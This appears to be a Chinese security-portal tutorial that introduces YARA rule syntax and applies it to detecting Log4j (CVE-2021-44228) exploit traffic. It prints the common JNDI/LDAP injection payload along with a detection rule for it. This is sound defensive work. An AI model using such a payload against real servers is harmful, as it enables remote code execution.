Yara规则下的威胁检测 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

工具

Yara规则下的威胁检测

2022-05-29 13:15:10

所属地海外

本文由创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

软件介绍

YARA 是一个旨在但不限于帮助恶意软件研究人员识别和分类恶意软件样本的工具。目前使用 YARA 的知名软件有赛门铁克、火眼、卡巴斯基、McAfee、VirusTotal 等。YARA工具可以基于文本或二进制模式创建恶意软件特征匹配。每个规则由一组字符串和一个确定其逻辑的布尔表达式组成。

通常YARA规则包含三部分：

元部分：这部分包含未处理但帮助用户了解内容的一般或特定的信息。

字符串部分：这部分包含需要在文件中搜索的所有字符串。

条件部分：这部分定义匹配的条件。

1653800866_6292ffa203dcece52e2df.png!small?1653800866542

软件安装

Windows环境下可直接下载编译好的exe程序进行检测分析，当前使用的版本为4.2。

下载地址：https://github.com/VirusTotal/yara

1653800883_6292ffb3e65461460e7e3.png!small?1653800884312

Mac环境下直接通过brew install yara安装（brew必须是官方安装的，不然会报错），当前使用的版本为4.2。

官方网站

https://yara.readthedocs.io/

1653800904_6292ffc88d2b103aa7c94.png!small?1653800904647

1653800914_6292ffd258378ac3e8e82.png!small?1653800914577

常用语法

1.Yara规则语法

Yara规则内容支持十六进制、字符串、正则表达式进行匹配。

十六进制：定义变量 $A={十六进制内容}

字符串：定义变量$A="字符串"

正则表达式：定义变量$A=/正则表达式内容/

2.Yara规则条件

逻辑关系

or：或

and：与

not：非

all of them：所有条件匹配即告警

any of them：有一个条件匹配即告警

$a and $b and $c：abc同时匹配即告警

($a and $b) or $c：匹配a和b或c即告警

3.Yara规则常用修饰符关键字

nocase：不区分大小写

base64：base64字符串

xor：异或字符串

wide：宽字符

4.Yara规则例子

rule ExampleRule { meta: tag = "example" description = "这是一个例子" author = "yunzui" strings $a = "jndi" nocase $b = "ladp" nocase condition: all of them }

1653800956_6292fffc38660e7edf858.png!small?1653800956392

实战检测运用

流量检测（log4j漏洞利用流量检测）

1.通过分析log4j漏洞利用原理及攻击常见payload

${jndi:ldap://ip:9999/Exp}

2.提取检测特征

1653800966_62930006886c86d1ce62a.png!small?1653800966638

3.输出检测yara规则

rule log4j

{

meta: description = "Log4j远程代码执行漏洞（CVE-2021-44228）

" author = "yunzui"

strings:

$a = "$"

$b = "jndi" nocase

$c = /(ldap|ldaps|rmi|dns|iiop)/ $d = /[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?|((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}/

condition:

all of them

}

1653801004_6293002c5f5edff8d812f.png!small?1653801004575